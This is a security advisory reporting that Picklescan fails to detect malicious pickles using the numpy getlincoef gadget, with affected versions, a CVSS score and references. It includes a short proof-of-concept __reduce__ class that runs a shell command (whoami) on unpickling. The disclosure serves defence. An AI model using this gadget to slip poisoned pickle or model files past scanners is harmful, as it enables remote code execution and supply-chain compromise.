GHSA-RRXM-2PVV-M66X

Vulnerability from github – Published: 2025-12-30 15:18 – Updated: 2025-12-30 15:18
VLAI?
Summary
Picklescan is vulnerable to RCE via missing detection when calling numpy.f2py.crackfortran.getlincoef
Details

Summary

Picklescan uses the numpy.f2py.crackfortran.getlincoef function (a NumPy F2PY helper) to execute arbitrary Python code during unpickling.

Details

Picklescan fails to detect a malicious pickle that uses the gadget numpy.f2py.crackfortran.getlincoef in __reduce__, allowing arbitrary command execution when the pickle is loaded. A crafted object returns this function plus attacker‑controlled arguments; the scan reports the file as safe, but pickle.load() triggers execution.

PoC

class PoC:
    def __reduce__(self):
        from numpy.f2py.crackfortran import getlincoef
        return getlincoef, ("__import__('os').system('whoami')", None)

Impact

  • Arbitrary code execution on the victim machine once they load the “scanned as safe” pickle / model file.
  • Affects any workflow relying on Picklescan to vet untrusted pickle / PyTorch artifacts.
  • Enables supply‑chain poisoning of shared model files.

Credits

Severity ?
8.2 (High)
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.33"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-502",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-30T15:18:16Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nPicklescan uses the `numpy.f2py.crackfortran.getlincoef` function (a NumPy F2PY helper) to execute arbitrary Python code during unpickling.\n\n### Details\n\nPicklescan fails to detect a malicious pickle that uses the gadget `numpy.f2py.crackfortran.getlincoef` in `__reduce__`, allowing arbitrary command execution when the pickle is loaded. A crafted object returns this function plus attacker\u2011controlled arguments; the scan reports the file as safe, but pickle.load() triggers execution.\n\n### PoC\n```python\nclass PoC:\n    def __reduce__(self):\n        from numpy.f2py.crackfortran import getlincoef\n        return getlincoef, (\"__import__(\u0027os\u0027).system(\u0027whoami\u0027)\", None)\n```\n\n### Impact\n\n- Arbitrary code execution on the victim machine once they load the \u201cscanned as safe\u201d pickle / model file.\n- Affects any workflow relying on Picklescan to vet untrusted pickle / PyTorch artifacts.\n- Enables supply\u2011chain poisoning of shared model files.\n\n### Credits\n- [ac0d3r](https://github.com/ac0d3r)\n- [Tong Liu](https://lyutoon.github.io), Institute of information engineering, CAS",
  "id": "GHSA-rrxm-2pvv-m66x",
  "modified": "2025-12-30T15:18:16Z",
  "published": "2025-12-30T15:18:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-rrxm-2pvv-m66x"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/pull/53"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Picklescan is vulnerable to RCE via missing detection when calling numpy.f2py.crackfortran.getlincoef"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.